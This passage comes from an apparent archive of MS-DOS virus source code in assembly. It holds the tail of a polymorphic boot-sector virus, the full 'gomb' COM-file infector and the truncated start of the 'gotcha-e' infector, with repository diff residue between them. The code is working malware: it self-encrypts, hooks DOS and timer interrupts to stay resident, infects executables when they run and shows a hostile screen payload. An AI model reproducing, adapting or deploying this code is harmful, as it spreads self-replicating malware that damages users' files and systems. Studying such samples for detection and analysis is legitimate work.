mov es,bx
mov dx,HD_0_HEAD_0
inc cx
int NEW_INT_13_LOOP
mov ax,READ_A_SECTOR
int DISK_INT
pop es
popa
another_return: ret
get_set_part endp
;-----------------------------------------------------------------------------
return_to_2f proc near
pop es
pop ds
popa
jmp far ptr original_2f_jmp
return_to_2f endp
;-----------------------------------------------------------------------------
interrupt_10 proc far
int_10_start: pushf
pusha
push ds
push es
push offset a_return+RELATIVE_OFFSET
from_com_code: xor bx,bx
mov ds,bx
or ah,ah
jz set_10_back
mov ax,QUERY_FREE_HMA
int MULTIPLEX_INT
cmp bh,high(MIN_FILE_SIZE+SECTOR_SIZE)
jb another_return
mov ax,ALLOCATE_HMA
int MULTIPLEX_INT
clc
call full_move_w_di
mov dx,offset int_13_start+RELATIVE_OFFSET
call set_13_chain
mov bx,VIRGIN_INT_2F-SET_INT_OFFSET
mov dx,offset interrupt_2f+RELATIVE_OFFSET
call set_interrupt
cmp word ptr ds:[LOW_JMP_10],cx
je set_10_back
push es
push es
mov di,DOS_INT_ADDR
mov bx,INT_21_IS_NOW*ADDR_MUL-SET_INT_OFFSET
call get_n_set_int+ONE_BYTE
pop ds
mov bx,offset old_int_10_21-SET_INT_OFFSET+RELATIVE_OFFSET+ONE_BYTE
call set_interrupt
mov ds,cx
mov ax,DOS_SET_INT+DOS_INT
mov dx,LOW_JMP_21
int INT_21_IS_NOW
pop es
mov bx,dx
mov dx,offset interrupt_21+RELATIVE_OFFSET
mov word ptr ds:[bx],0b450h
mov word ptr ds:[bx+TWO_BYTES],0cd19h
mov word ptr ds:[bx+FOUR_BYTES],05800h+INT_21_IS_NOW
call set_int_10_21
set_10_back: mov di,offset old_int_10_21+RELATIVE_OFFSET+ONE_BYTE
mov bx,LOW_JMP_10-FAR_JUMP_OFFSET
interrupt_10 endp
;-----------------------------------------------------------------------------
get_n_set_int proc near
les dx,dword ptr cs:[di]
jmp short set_interrupt
set_int_10_21: mov byte ptr ds:[bx+FAR_JUMP_OFFSET],FAR_JUMP
set_interrupt: mov word ptr ds:[bx+SET_INT_OFFSET],dx
mov word ptr ds:[bx+CHANGE_SEG_OFF],es
ret
get_n_set_int endp
;-----------------------------------------------------------------------------
IF MULTIPARTITE
set_both_ints proc near
mov bx,(NEW_INT_13_LOOP*ADDR_MUL)-SET_INT_OFFSET
call get_n_set_int+ONE_BYTE
mov bl,low(BIOS_INT_13*ADDR_MUL)-SET_INT_OFFSET
jmp short set_interrupt
set_both_ints endp
ENDIF
;-----------------------------------------------------------------------------
IF EXECUTE_SPAWNED
exec_table db COMMAND_LINE,FIRST_FCB,SECOND_FCB
ENDIF
;-----------------------------------------------------------------------------
IF MODEM_CODE
org PART_OFFSET+001f3h
string db CR,'1O7=0SLMTA'
ENDIF
;-----------------------------------------------------------------------------
org PART_OFFSET+SECTOR_SIZE-TWO_BYTES
partition_sig dw 0aa55h
;-----------------------------------------------------------------------------
org PART_OFFSET+SECTOR_SIZE+TWO_BYTES
file_name db 'DA',027h,'BOYS.COM',NULL
;-----------------------------------------------------------------------------
org PARAMETER_TABLE
dw NULL,NULL,NULL,NULL,NULL,NULL,NULL
db NULL
;-----------------------------------------------------------------------------
IFE MULTIPARTITE
boot_load proc near
push cs
pop es
call full_move_w_si
mov ds,cx
cmp cx,word ptr ds:[NEW_INT_13_LOOP*ADDR_MUL]
jne dont_set_intcd
lds dx,dword ptr ds:[VIRGIN_INT_13_B]
mov ax,DOS_SET_INT+NEW_INT_13_LOOP
int DOS_INT
dont_set_intcd: mov ah,high(GET_DEFAULT_DR)
int DOS_INT
call from_com_code+RELATIVE_OFFSET
mov ax,TERMINATE_W_ERR
int DOS_INT
boot_load endp
ENDIF
;-----------------------------------------------------------------------------
IF POLYMORPHIC
load_it proc near
mov word ptr ds:[si],FILE_SIGNATURE
mov byte ptr ds:[si+TWO_BYTES],FIRST_UNDO_OFF
push bx
xor ax,ax
cli
out 043h,al
in al,040h
mov ah,al
in al,040h
sti
push ax
and ax,0001eh
mov bx,ax
mov ax,word ptr ds:[bx+two_byte_table]
mov word ptr ds:[si+ROTATED_OFFSET+TWO_BYTES],ax
org $-REMOVE_NOP
pop ax
and ax,003e0h
mov cl,FIVE_BITS
shr ax,cl
mov bx,ax
mov al,byte ptr ds:[bx+one_byte_table]
xor al,low(INC_BL)
mov byte ptr ds:[swap_incbx_bl+THREE_BYTES],al
pop bx
jmp com_start
load_it endp
;-----------------------------------------------------------------------------
two_byte_table: mov al,0b2h
xor al,0b4h
and al,0d4h
les ax,dword ptr ds:[si]
les cx,dword ptr ds:[si]
les bp,dword ptr ds:[si]
adc al,0d4h
and al,084h
adc al,084h
adc al,024h
add al,084h
add al,014h
add al,024h
test dl,ah
repz stc
repnz stc
;-----------------------------------------------------------------------------
one_byte_table: int SINGLE_BYTE_INT
into
daa
das
aaa
aas
inc ax
inc cx
inc dx
inc bp
inc di
dec ax
dec cx
dec dx
dec bp
dec di
nop
xchg ax,cx
xchg ax,dx
xchg ax,bp
xchg ax,di
cbw
cwd
lahf
scasb
scasw
xlat
repnz
repz
cmc
clc
stc
ENDIF
;-----------------------------------------------------------------------------
gold_bug endp
cseg ends
end com_code

1027
MSDOS/Virus.MSDOS.Unknown.gollum.asm Normal file
View File

File diff suppressed because it is too large Load Diff

900
MSDOS/Virus.MSDOS.Unknown.gomb.asm Normal file
View File

@ -0,0 +1,900 @@
CODE segment para public 'code'
assume cs:code,ds:code,es:nothing,ss:nothing
org 100h
egy equ 1 ; one
dma equ 0b0h
atvar equ 300 ; at paramaeter
xtvar equ 1 ; xt parameter
suruseg equ 255 ; density
idotartalek equ 18*30 ; time delay
start: db 0e9h,0,0
;##################### Initialization ######################
resid: push ax
mov cx,offset memory - offset begin ;#### decoding ####
mov bx,ds:[101h]
add bx,103h+(offset begin-offset resid)
jhg1: xor byte ptr [bx],0
inc bx
loop jhg1
begin: sub bx,(offset begin-offset resid)+(offset memory - offset begin)
mov cs:[0feh],bx
mov ax,[bx+(offset eltarol-offset resid)]
mov cl,[bx+(offset eltarol-offset resid)+2]
mov ds:[100h],ax
mov ds:[102h],cl
mov cx,0b800h
mov ah,15
push bx
int 10h
pop bx
cmp al,7
jne rety
mov ch,0b0h
rety: mov [bx+(offset ruut - offset resid)+1],cx
mov word ptr [bx+(offset counter-offset resid)],idotartalek
mov byte ptr [bx+(offset jammed-offset resid)+1],al
mov byte ptr [bx+(offset vanesik-offset resid)],0
xor ax,ax
mov ds,ax
cmp word ptr ds:[130h],4142h
je zipp
mov ds:[130h],4142h
mov ax,cs
dec ax
mov ds,ax
mov ax,ds:[3]
sub ax,180h
mov ds:[3],ax
add ax,ds:[1]
mov es,ax
push cs
pop ds
sub word ptr ds:[2],384
mov di,3
mov si,bx
mov cx,(offset memory-offset resid) shr 1 +1
cld
rep movsw
mov ax,es
sub ax,10h
mov ds,ax
mov dx,offset irq
mov ax,251ch
int 21h
mov ah,2ah
int 21h
cmp al,1
jne zipp
dec al
out 0a0h,al
mov al,dma
out 41h,al
zipp:
mov ax,cs
mov ds,ax
mov es,ax
pop ax
push cs
mov cx,100h
push cx
mov cx,ds:[0feh]
sub cx,100h
retf
eltarol dw 20cdh
eltarol2 db 90h
;######################### Vyrus activated ##########################
csik: mov ax,0e000h
mov ds,ax
csiky: mov ds:[0],al
inc al
jmp csiky
;######################### propagation part ##########################
eredeti: db 0eah ; original
int211 dw 0
int212 dw 0
counter dw 0
szaporodas: cmp ah,4bh
jne eredeti
or al,al
jnz eredeti
push ax
push es
push bx
push ds
push dx
mov bx,dx
koj: inc bx
cmp byte ptr [bx],'.'
jne koj
cmp byte ptr[bx+1],'C'
jne kiugras1
mov cs:kds,ds
mov cs:kdx,dx
mov cs:kbx,bx
call probe
kiugras1: pop dx
pop ds
pop bx
pop es
pop ax
jmp eredeti
kds dw 0
kdx dw 0
kbx dw 0
kkk dw 0
fszam dw 0
probe: push cs
pop es
mov di,offset memory
mov si,dx
mov cx,40
cld
rep movsw
mov bx,0ff0h
mov ah,48h
int 21h
jnc juk1
ret
;!!!!! memoria lefoglalva (kkk = Seg)
atr dw 0
juk1: mov cs:kkk,ax
mov dx,offset memory
push ds
pop es
mov bx,cs:kbx
mov byte ptr [bx+1],'A'
call elorutin
push cs
pop ds ;DS:DX a masolt nev.
mov ax,4300h
int 21h
mov atr,cx
xor cx,cx
mov ax,4301h
int 21h
;!!!!! Attr allitas
cmp cs:attrflag,0
jz juk2
mov ds,cs:kds
jmp memoff
juk2: mov di,kdx ;ES:DI a regi nev atirva
mov ah,56h
int 21h
call utorutin ;!!!!! Atnevezve
mov dx,cs:kdx
push es
pop ds
mov ax,3d02h
int 21h ;!!!!! File megnyitva
mov cs:fszam,ax
mov ds,cs:kkk
xor dx,dx
mov bx,ax
mov cx,0fc00h-(offset memory-offset resid)
mov ah,3fh
int 21h
cmp ax,0fc00h-(offset memory-offset resid)
;!!!!! Beolvasva a program (csak a hossza miatt)
je hosszu ;zarjuk le a file-t
cmp ax,7580
jb hosszu ;tul rovid a file
mov di,ax
mov bx,ds:[1]
cmp word ptr [bx+3],0b950h
;$$$$$$$$$$$$$$$$$$$$$$$$$ FUCK OFF TASM,MASM $$$$$$$$$$$$$$$$$$$$$$$$$$$
je hosszu
push di
mov cx,(offset memory-offset resid)
mov si,offset resid
push ds
pop es
push cs
pop ds
inc byte ptr ds:[offset jhg1 +2]
mov ax,es:[0]
mov eltarol,ax
mov al,es:[2]
mov eltarol2,al
rep movsw ;!!!!! Atmasolva (hehe)
mov al,byte ptr ds:[offset jhg1 +2]
pop di
add di,(offset begin-offset resid)
mov cx,offset memory - offset begin ;#### coding ####
jhga: xor byte ptr es:[di],al
inc di
loop jhga
sub di,(offset memory - offset resid)
push di ;Az ugrasi hely
mov bx,fszam
mov cx,offset memory - offset begin
mov dx,di
push es
pop ds
mov ah,40h
int 21h
pop di
cmp ax,offset memory - offset begin
je ghj1
hosszu: jmp zardle
ghj1: ;!!!!! Kiirva a vege
mov byte ptr ds:[0],0e9h
sub di,3
mov ds:[1],di
mov bx,cs:fszam
xor cx,cx
xor dx,dx
mov ax,4200h
push bx
int 21h
pop bx
mov cx,3
xor dx,dx
mov ah,40h
int 21h
zardle: mov bx,cs:fszam
mov ah,3eh
int 21h ;!!!!! File lezarva
push cs
pop es
mov di,offset memory
mov ds,cs:kds
mov dx,cs:kdx
mov ah,56h
int 21h ;!!!!! File visszanevezve
mov bx,cs:kbx
mov byte ptr ds:[bx+1],'C'
mov ax,4301h
mov cx,cs:atr
int 21h ;!!!!! attr visszaall
memoff: mov bx,cs:kbx
mov byte ptr ds:[bx+1],'C'
push cs
pop ds
mov es,cs:kkk
mov ah,49h
int 21h ;!!!!! Memoria visszaalt
ret
it241 dw 0
it242 dw 0
attrflag db 0
elorutin: mov cs:attrflag,0
xor ax,ax
mov ds,ax
mov ax,ds:[90h]
mov cs:it241,ax
mov ax,ds:[92h]
mov cs:it242,ax
mov ds:[90h],offset it24
mov ds:[92h],cs
ret
utorutin: xor ax,ax
mov ds,ax
mov ax,cs:it241
mov ds:[90h],ax
mov ax,cs:it242
mov ds:[92h],ax
ret
it24: mov cs:attrflag,1
xor al,al
iret
vanesik db 0
irq: cli
push ds
push es
push ax
push bx
push cx
push dx
push si
push di
cmp cs:counter,0
je sabad
dec cs:counter
jne sabad
xor ax,ax
mov ds,ax
mov ax,ds:[84h]
mov cs:int211,ax
mov ax,ds:[86h]
mov cs:int212,ax
mov ds:[84h],offset szaporodas
mov ds:[86h],cs
sabad: cmp cs:vanesik,0
je keress
call idovan
jmp jumper
keress: call ruut
jumper: pop di
pop si
pop dx
pop cx
pop bx
pop ax
pop es
pop ds
iret
idovan: xor ah,ah
int 1ah
and dx,suruseg
jne rutyi
call action
rutyi: ret
ruut: mov ax,0b800h
mov es,ax
mov di,cs:did
mov cx,512
cld
poke: jcxz huy
mov al,'E'
repnz scasb
jz talalt
huy: cmp di,4095
jb kisebb
mov cs:did,0
ret
kisebb: add cs:did,512
ret
did dw 0
talalt: test di,1
jz poke
mov dl,es:[di+1]
mov dh,es:[di+3]
or dx,2020h
cmp dx,6973h ;'is'
jne poke
mov bl,es:[di+5]
or bl,20h
cmp bl,'k'
jne poke
mov cs:vanesik,1
jmp huy
action: mov ax,cs
mov ds,ax
mov es,ax
mov vanesik,0
mov pontszam,1
mov si,offset zizi
mov di,offset novi
cld
mov cx,6
rep movsw
call zoldseg
jammed: mov ax,3
int 10h
cmp counterr,atvar
jne fdr
push cs
pop es
lea bx,mess
mov ax,1301h
mov bx,1
xor dx,dx
mov cx,offset drt-offset mess
int 10h
fdr: ret
counterr dw 0
zoldseg: cli
mov di,offset memory
xor ax,ax
cld
mov cx,200*3
rep stosw
mov ah,0c0h
mov si,3333h
int 15h
cmp si,3333h
mov ax,xtvar
je xt
mov ax,atvar
xt: mov counterr,ax
mov ax,3502h
int 21h
cmp bx,0e9eh
jne ibm
call init1
mov pontm,100
mov port,22h
jmp entry
ibm: ;Ibm bulik
mov pontm,200
mov al,70h
mov port,60h ;%
mov ah,15
int 10h
cmp al,7
jne cga
call init3
jmp entry
cga: call init2
jmp entry
port dw 22h
pontm dw 100
init1: mov ax,200h
mov es,ax
xor di,di
mov cx,4000h
cld
xor ax,ax
rep stosw
mov plotdw,offset plot
mov unplotdw,offset unplot
ret
init2: mov ax,0b800h
mov es,ax
mov ax,6
int 10h
mov plotdw,offset plotcga
mov unplotdw,offset unplotcga
ret
init3: mov ax,0b000h
mov es,ax
call prog
mov plotdw,offset plotherc
mov unplotdw,offset unplotcga
ret
prog: mov dx,3bfh
mov al,3
out dx,al
mov al,28h
mov dx,3b8h
out dx,al
mov ah,0
mov cx,12
lea bx,ports
lopi1: mov dx,03b4h
mov al,ah
out dx,al
inc ah
mov dx,03b5h
mov al,[bx]
out dx,al
inc bx
loop lopi1
mov dx,3bfh
mov al,3
out dx,al
mov dx,3b8h
mov al,0ah
out dx,al
xor di,di
mov cx,4000h
xor ax,ax
cld
rep stosw
ret
ports db 35h,2dh,2eh,7,5bh,2,57h,57h,2,3,0,0
;**************************** Forgatorutin ************************************
even
sina dw 0
cosa dw 0 ;si-t meghagyja
sinb dw 0
cosb dw 0
pontszam dw 1
transzform: ;be: di=X, bx=Y, cx=Z, SINA,COSA,SINB,COSB
; add bx,ytol ;ez itt jolesz
shl di,1
shl bx,1 ;X es Y elokeszitese a szorzashoz
mov ax,di
imul cosa
mov bp,dx
mov ax,bx
imul sina
add bp,dx ; bp=X' = cosa*X + sina*Y
mov ax,bx
imul cosa
mov bx,dx
mov ax,di
imul sina
sub bx,dx ; bx=Y' = cosa*X - sina*Y
shl bp,1
shl cx,1 ;X' es Z elokeszitese
mov ax,bp
imul cosb
mov di,dx
mov ax,cx
imul sinb
sub di,dx ; di=X'' = cosb*X' - sinb*Z
mov cx,di
mov ax,bx
ret
comment @
mov ax,cx
imul cosb
mov cx,dx
mov ax,bp
imul sinb
add cx,dx ; cx=Z'' = cosb*Z = sinb*X'
; out: di=X'' bx=Y'' cx=Z''
mov dx,keptav
;****************************** PERSPEKTIVA **********************************
mov ax,di
shl ax,1
imul tavol
mov cx,dx
mov ax,bx
shl ax,1
imul tavol
mov ax,dx
ret ; ki : CX=X' AX=Y'
@
plotherc: ; al=y cx=x
xor ah,ah
mov dx,ax
shr dx,1
add ax,dx
mov dx,cx
mov cl,al
and cl,3
shr ax,1
shr al,1
mov di,2000h
shl di,cl
mov cl,90
mul cl
add di,ax
mov ax,dx
mov cx,dx
jmp ezisi
plotcga: xor di,di
shr ax,1
jnc tryp
mov di,2000h
tryp: mov dl,80
mul dl
add di,ax
mov ax,cx
ezisi: shr ax,1
shr ax,1
shr ax,1
add di,ax
and cl,7
mov al,128
shr al,cl
or es:[di],al
jmp ezis1
unplotcga: mov al,[bx]
mov di,[bx+1]
xor al,255
and es:[di],al
ret
plot: ;AL = y koord. cx = x koord.
mov dl,160
mul dl
mov di,ax
mov ax,cx
shr ax,1
shr ax,1
add di,ax
and di,-2
and cl,7
mov al,128
shr al,cl
or es:[di+egy],al
ezis1: mov [bx],al
inc bx
mov [bx],di
add bx,2
ret
unplot: mov al,[bx]
mov di,[bx+1]
xor al,255
and es:[di+egy],al
ret
kezdfazisrajz: mov bx,offset memory
mov si,offset gombdata
mov cx,pontszam
ck1: push cx
lodsw
mov cx,ax
shl cx,1
add cx,320
lodsw
add si,2
add ax,50
call word ptr [plotdw]
pop cx
loop ck1
ret
indy db 0
fazisrajz: mov bx,offset memory
mov si,offset gombdata
mov cx,pontszam
mov indy,1
ck12: push cx
call word ptr [unplotdw]
push bx
lodsw
mov di,ax
lodsw
mov bx,ax
lodsw
mov cx,ax
call transzform
pop bx
add ax,50
mov di,bxpo
add al,[di]
shl cx,1
add cx,bxpo2
cmp indy,0
je ruty
mov indy,0
cmp karal2,0
jne ruty
push cx
push ax
inc cx
call word ptr [plotdw]
pop ax
pop cx
sub bx,3
ruty: call word ptr [plotdw]
pop cx
loop ck12
ret
novpont: mov ax,pontm
cmp pontszam,ax
je trew
mov cx,pontm
sub cx,pontszam
mov ch,cl
shR cx,1
shr cx,1
yut: loop yut
inc pontszam
ret
trew: call movie
mov bx,bxpo
cmp bx,offset patt
je valto
cmp bx,offset patt+29
je valto
iuy: add bx,novi
mov bxpo,bx
ret
valto: neg novi
jmp iuy
novi dw -1
bxpo dw offset patt
bxpo2 dw 320
novi2 dw 4
karal dw 300
karal2 dw 600
zizi dw -1,offset patt,320,4,300,600
movie: cmp karal,0
je jesty
dec karal
ret
jesty: cmp karal2,0
je jesty2
dec karal2
jesty2: mov bx,bxpo2
cmp bx,100
je valto2
cmp bx,540
je valto2
iuy2: add bx,novi2
mov bxpo2,bx
ret
valto2: neg novi2
jmp iuy2
elokesz: call novpont
mov bl,szogx
xor bh,bh
shl bx,1
mov ax,sintabl[bx]
mov sina,ax
mov ax,costabl[bx]
mov cosa,ax
mov bl,szogy
xor bh,bh
shl bx,1
mov ax,sintabl[bx]
mov sinb,ax
mov ax,costabl[bx]
mov cosb,ax
mov al,szogxvalt
add szogx,al
mov al,szogyvalt
add szogy,al
ret
even
szogx db 0
szogy db 0
szogxvalt db 2
szogyvalt db 5
tavol dw 32767
phase: call elokesz
call fazisrajz
ret
entry: call kezdfazisrajz
rajta1: call phase
cmp pontm,100
je apc
cmp byte ptr ds:[offset ruut +2],0b8h
je ccggaa
mov cx,counterr
mov dx,3bah
qaz1: in al,dx
and al,1
jnz qaz1
qaz2: in al,dx
and al,1
jz qaz2
loop qaz1
jmp apc
ccggaa: mov dx,3dah
qaz3: in al,dx
and al,8
jnz qaz3
qaz4: in al,dx
and al,8
jz qaz4
apc: mov dx,port
in al,dx
and al,1
jz rajta1
ret
even
plotdw dw 0
unplotdw dw 0
sintabl dw 0, 804, 1608, 2410, 3212, 4011, 4808, 5602, 6393
dw 7179, 7962, 8739, 9512, 10278, 11039, 11793, 12539, 13279
dw 14010, 14732, 15446, 16151, 16846, 17530, 18204, 18868, 19519
dw 20159, 20787, 21403, 22005, 22594, 23170, 23731, 24279, 24811
dw 25329, 25832, 26319, 26790, 27245, 27683, 28105, 28510, 28898
dw 29268, 29621, 29956, 30273, 30571, 30852, 31113, 31356, 31580
dw 31785, 31971, 32137, 32285, 32412, 32521, 32609, 32678, 32728
dw 32757, 32767, 32757, 32728, 32678, 32609, 32521, 32412, 32285
dw 32137, 31971, 31785, 31580, 31356, 31113, 30852, 30571, 30273
dw 29956, 29621, 29268, 28898, 28510, 28105, 27683, 27245, 26790
dw 26319, 25832, 25329, 24811, 24279, 23731, 23170, 22594, 22005
dw 21403, 20787, 20159, 19519, 18868, 18204, 17530, 16846, 16151
dw 15446, 14732, 14010, 13279, 12539, 11793, 11039, 10278, 9512
dw 8739, 7962, 7179, 6393, 5602, 4808, 4011, 3212, 2410
dw 1608, 804, 0, -804, -1608, -2410, -3212, -4011, -4808
dw -5602, -6393, -7179, -7962, -8739, -9512,-10278,-11039,-11793
dw -12539,-13279,-14010,-14732,-15446,-16151,-16846,-17530,-18204
dw -18868,-19519,-20159,-20787,-21403,-22005,-22594,-23170,-23731
dw -24279,-24811,-25329,-25832,-26319,-26790,-27245,-27683,-28105
dw -28510,-28898,-29268,-29621,-29956,-30273,-30571,-30852,-31113
dw -31356,-31580,-31785,-31971,-32137,-32285,-32412,-32521,-32609
dw -32678,-32728,-32757,-32767,-32757,-32728,-32678,-32609,-32521
dw -32412,-32285,-32137,-31971,-31785,-31580,-31356,-31113,-30852
dw -30571,-30273,-29956,-29621,-29268,-28898,-28510,-28105,-27683
dw -27245,-26790,-26319,-25832,-25329,-24811,-24279,-23731,-23170
dw -22594,-22005,-21403,-20787,-20159,-19519,-18868,-18204,-17530
dw -16846,-16151,-15446,-14732,-14010,-13279,-12539,-11793,-11039
dw -10278, -9512, -8739, -7962, -7179, -6393, -5602, -4808, -4011
dw -3212, -2410, -1608, -804
costabl dw 32767, 32757, 32728, 32678, 32609, 32521, 32412, 32285
dw 32137, 31971, 31785, 31580, 31356, 31113, 30852, 30571
dw 30273, 29956, 29621, 29268, 28898, 28510, 28105, 27683
dw 27245, 26790, 26319, 25832, 25329, 24811, 24279, 23731
dw 23170, 22594, 22005, 21403, 20787, 20159, 19519, 18868
dw 18204, 17530, 16846, 16151, 15446, 14732, 14010, 13279
dw 12539, 11793, 11039, 10278, 9512, 8739, 7962, 7179
dw 6393, 5602, 4808, 4011, 3212, 2410, 1608, 804
dw 0, -804, -1608, -2410, -3212, -4011, -4808, -5602
dw -6393, -7179, -7962, -8739, -9512,-10278,-11039,-11793
dw -12539, -13279,-14010,-14732,-15446,-16151,-16846,-17530
dw -18204, -18868,-19519,-20159,-20787,-21403,-22005,-22594
dw -23170, -23731,-24279,-24811,-25329,-25832,-26319,-26790
dw -27245, -27683,-28105,-28510,-28898,-29268,-29621,-29956
dw -30273, -30571,-30852,-31113,-31356,-31580,-31785,-31971
dw -32137, -32285,-32412,-32521,-32609,-32678,-32728,-32757
dw -32767, -32757,-32728,-32678,-32609,-32521,-32412,-32285
dw -32137, -31971,-31785,-31580,-31356,-31113,-30852,-30571
dw -30273, -29956,-29621,-29268,-28898,-28510,-28105,-27683
dw -27245, -26790,-26319,-25832,-25329,-24811,-24279,-23731
dw -23170, -22594,-22005,-21403,-20787,-20159,-19519,-18868
dw -18204, -17530,-16846,-16151,-15446,-14732,-14010,-13279
dw -12539, -11793,-11039,-10278, -9512, -8739, -7962, -7179
dw -6393, -5602, -4808, -4011, -3212, -2410, -1608, -804
dw 0, 804, 1608, 2410, 3212, 4011, 4808, 5602
dw 6393, 7179, 7962, 8739, 9512, 10278, 11039, 11793
dw 12539, 13279, 14010, 14732, 15446, 16151, 16846, 17530
dw 18204, 18868, 19519, 20159, 20787, 21403, 22005, 22594
dw 23170, 23731, 24279, 24811, 25329, 25832, 26319, 26790
dw 27245, 27683, 28105, 28510, 28898, 29268, 29621, 29956
dw 30273, 30571, 30852, 31113, 31356, 31580, 31785, 31971
dw 32137, 32285, 32412, 32521, 32609, 32678, 32728, 32757
gombdata:
DW 44, 3, 22, 29, 6, 40, 7, 9, 48,-14, 12, 46
DW -33, 15, 33,-44, 18, 14,-44, 21, -7,-35, 24,-25
DW -19, 26,-37, 0, 29,-40, 17, 31,-34, 29, 34,-21
DW 33, 36, -5, 30, 38, 9, 20, 40, 20, 8, 42, 25
DW -3, 43, 23,-12, 45, 17,-16, 46, 8,-15, 47, 0
DW -11, 48, -5, -5, 49, -7, 0, 49, -6, 0, 49, -2
DW 0, 49, 0, -2, 49, 0, -6, 49, 0, -7, 49, -5
DW -5, 48,-11, 0, 47,-15, 8, 46,-16, 17, 45,-12
DW 23, 43, -3, 25, 42, 8, 20, 40, 20, 9, 38, 30
DW -5, 36, 33,-21, 34, 29,-34, 31, 17,-40, 29, 0
DW -37,26,-19,-25,24,-35,-7,21,-44,14,18,-44
DW 33,15,-33,46,12,-14,48,9,7,40,6,29
DW 22,3,44,0,0,49,-22,-3,44,-40,-6,29
DW -48,-9,7,-46,-12,-14,-33,-15,-33,-14,-18,-44
DW 7,-21,-44,25,-24,-35,37,-26,-19,40,-29,0
DW 34,-31,17,21,-34,29,5,-36,33,-9,-38,30
DW -20,-40,20,-25,-42,8,-23,-43,-3,-17,-45,-12
DW -8,-46,-16,0,-47,-15,5,-48,-11,7,-49,-5
DW 6,-49,0,2,-49,0,0,-49,0,0,-49,-2
DW 0,-49,-6,5,-49,-7,11,-48,-5,15,-47,0
DW 16,-46,8,12,-45,17,3,-43,23,-8,-42,25
DW -20,-40,20,-30,-38,9,-33,-36,-5,-29,-34,-21
DW -17,-31,-34,0,-29,-40,19,-26,-37,35,-24,-25
DW 44,-21,-7,44,-18,14,33,-15,33,14,-12,46
DW -7,-9,48,-29,-6,40,-44,-3,22,-49,0,0
DW -44,3,-22,-29,6,-40,-7,9,-48,14,12,-46
DW 33,15,-33,44,18,-14,44,21,7,35,24,25
DW 19,26,37,0,29,40,-17,31,34,-29,34,21
DW -33,36,5,-30,38,-9,-20,40,-20,-8,42,-25
DW 3,43,-23,12,45,-17,16,46,-8,15,47,0
DW 11,48,5,5,49,7,0,49,6,0,49,2
DW 0,49,0,2,49,0,6,49,0,7,49,5
DW 5,48,11,0,47,15,-8,46,16,-17,45,12
DW -23,43,3,-25,42,-8,-20,40,-20,-9,38,-30
DW 5,36,-33,21,34,-29,34,31,-17,40,29,0
DW 37,26,19,25,24,35,7,21,44,-14,18,44
DW -33,15,33,-46,12,14,-48,9,-7,-40,6,-29
DW -22,3,-44,0,0,-49,22,-3,-44,40,-6,-29
DW 48,-9,-7,46,-12,14,33,-15,33,14,-18,44
DW -7,-21,44,-25,-24,35,-37,-26,19,-40,-29,0
DW -34,-31,-17,-21,-34,-29,-5,-36,-33,9,-38,-30
DW 20,-40,-20,25,-42,-8,23,-43,3,17,-45,12
DW 8,-46,16,0,-47,15,-5,-48,11,-7,-49,5
DW -6,-49,0,-2,-49,0,0,-49,0,0,-49,2
DW 0,-49,6,-5,-49,7,-11,-48,5,-15,-47,0
DW -16,-46,-8,-12,-45,-17,-3,-43,-23,8,-42,-25
DW 20,-40,-20,30,-38,-9,33,-36,5,29,-34,21
DW 17,-31,34,0,-29,40,-19,-26,37,-35,-24,25
DW -44,-21,7,-44,-18,-14,-33,-15,-33,-14,-12,-46
DW 7,-9,-48,29,-6,-40,44,-3,-22,49,0,0
patt: DB 0, 0, 0, 0, 0, 1, 1, 2, 4, 5, 7, 9,11,14,17,20,23,27
db 31,35,40,45,50,56,61,67,73,80,86,93
mess db 'HARD HIT & HEAVY HATE the HUMANS !!'
db ' [ H.H.& H.H. the H. ] '
drt dw 5 dup (0)
memory:
CODE ENDS
END START
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

397
MSDOS/Virus.MSDOS.Unknown.gotcha-e.asm Normal file
View File

@ -0,0 +1,397 @@
;****************************************************************************
;* stripped COM-versie
;* met signature's
;*
;****************************************************************************
cseg segment
assume cs:cseg,ds:cseg,es:nothing
org 100h
SIGNLEN equ signend - signature
FILELEN equ eind - begin
RESPAR equ (FILELEN/16) + 17
BUFLEN equ 08h
VERSION equ 4
.RADIX 16
;****************************************************************************
;* Opstart programma
;****************************************************************************
begin: xor bx,bx
mov cl,07h
crloop: call crypt
loop crloop
call install
int 20
;****************************************************************************
;* Data
;****************************************************************************
buffer db BUFLEN dup (?)
oi21 dw ?,?
oldlen dw ?
handle dw ?
sign db 0
;****************************************************************************
;* Interupt handler 21
;****************************************************************************
ni21: pushf
cmp ax,4B00h
jne ni_verder
push es
push ds
push ax
push bx
push cx
push dx
call attach
mov cl,[sign]
call crypt
inc cl
and cl,07h
mov [sign],cl
call crypt
pop dx
pop cx
pop bx
pop ax
pop ds
pop es
exit: popf
jmp dword ptr cs:[oi21] ;naar oude int-handler
ni_verder: cmp ax,0DADAh
jne exit
mov ax,0A500h+VERSION
popf
iret
;****************************************************************************
;* plakt programma aan file (ASCIIZ DS:DX)
;****************************************************************************
attach: cld
mov ax,3D02h ;open de file
int 21
jc finnish
push cs
pop ds
mov [handle],ax ;bewaar file-handle
call eindptr ;bepaal lengte
jc finnish
mov [oldlen],ax
sub ax,SIGNLEN ;pointer naar eind - SIGNLEN
sbb dx,0
mov cx,dx
mov dx,ax
mov al,00h
call ptrmov
jc finnish
mov cx,SIGNLEN ;lees de laatse bytes
mov dx,offset buffer
call flread
jc finnish
verder3: push cs ;vergelijk signature met buffer
pop es
mov di,offset buffer
mov si,offset signature
mov cx,SIGNLEN
rep cmpsb
or cx,cx
jz finnish
call beginptr ;lees begin van file
mov cx,BUFLEN
mov dx,offset buffer
call flread
jc finnish
cmp word ptr [buffer],5A4Dh
jz finnish
call writeprog ;schrijf programma naar file
jc finnish
mov ax,[oldlen] ;bereken call-adres
add ax,offset entry
sub ax,0103
